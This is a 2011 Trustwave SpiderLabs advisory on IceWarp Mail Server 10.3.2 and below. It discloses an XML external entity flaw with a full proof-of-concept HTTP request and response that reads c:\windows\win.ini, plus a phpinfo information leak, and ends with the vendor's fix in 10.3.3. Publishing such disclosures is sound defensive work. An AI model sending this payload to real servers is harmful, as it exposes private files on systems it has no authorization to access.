Trustwave's SpiderLabs Security Advisory TWSL2011-013: Multiple Vulnerabilities in IceWarp Mail Server https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt Published: 2011-09-23 Version: 1.0 Vendor: IceWarp (http://www.icewarp.com) Product: IceWarp Mail Server Version affected: 10.3.2 and below Product description: IceWarp WebMail is the web front-end for the IceWarp Mail Server, which provides email access on over 50,000 servers. IceWarp WebMail provides web-based access to email, calendars, contacts, files and shared data from any computer with a browser and Internet connection. Credit: David Kirkpatrick of Trustwave's SpiderLabs Finding 1: XML External Entity Injection CVE: CVE-2011-3579 An external entity is a function of the XML specification which allows XML documents to reference resources external to the XML document. This functionality forces the XML parser of the application to access the resource specified. In this case it is possible to inject an XML DOCTYPE "SYSTEM" directive to access local files on the operating system where the IceWarp server is installed. Using this technique it is possible to retrieve readable files on the operating system. This attack can also be used to create a possible denial of service condition. Proof-of-Concept: The following POST request was sent to the host A.B.C.D where the IceWarp mail server was running: REQUEST ========= POST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1 Host:A.B.C.D User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language:en-gb,en;q=0.5i've Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D Content-Length: 249 Content-Type: application/xml;charset=UTF-8 Pragma: no-cache Cache-Control: no-cache <!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM "file:///c:/windows/win.ini"> ]><iq type="set"><query xmlns="webmail:iq:auth"><username>test&xxeb91c4;</username><digest>828cd27c 6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffc d2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method>< /query></iq> RESPONSE: ========== HTTP/1.1 200 OK Server: IceWarp/9.4.2 Date: Wed, 20 Jul 2011 10:04:56 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/xml Vary: Accept-Encoding Content-Length: 1113 <?xml version="1.0" encoding="utf-8"?><iq type="error"><error uid="login_invalid">test; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 ...TRUNCATED The above proof-of-concept would retrieve the c:\windows\win.ini file (the response in this example has been truncated). Finding 2: PHP Information Disclosure CVE: CVE-2011-3580 It is possible to retrieve the PHP information file phpinfo() by accessing the following URL http://A.B.C.D/server where A.B.C.D is the IP of the server running the IceWarp software. The response will be a page detailing the PHP version used and the configuration settings of PHP, including system details. Vendor Response: These issues have been addressed as of version 10.3.3 Remediation Steps: Customers should update to the latest version of IceWarp Mail Server in order to address these issues. The above issues have been corrected in version 10.3.3. Revision History: 08/03/11 - Vulnerability disclosed 09/19/11 - Patch released 09/23/11 - Advisory published About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs is the advance security team at Trustwave responsible for incident response and forensics, ethical hacking and application security tests for Trustwave's clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of ethical hacking exercises and tested the security of hundreds of business applications for Fortune 500 organizations. For more information visit https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.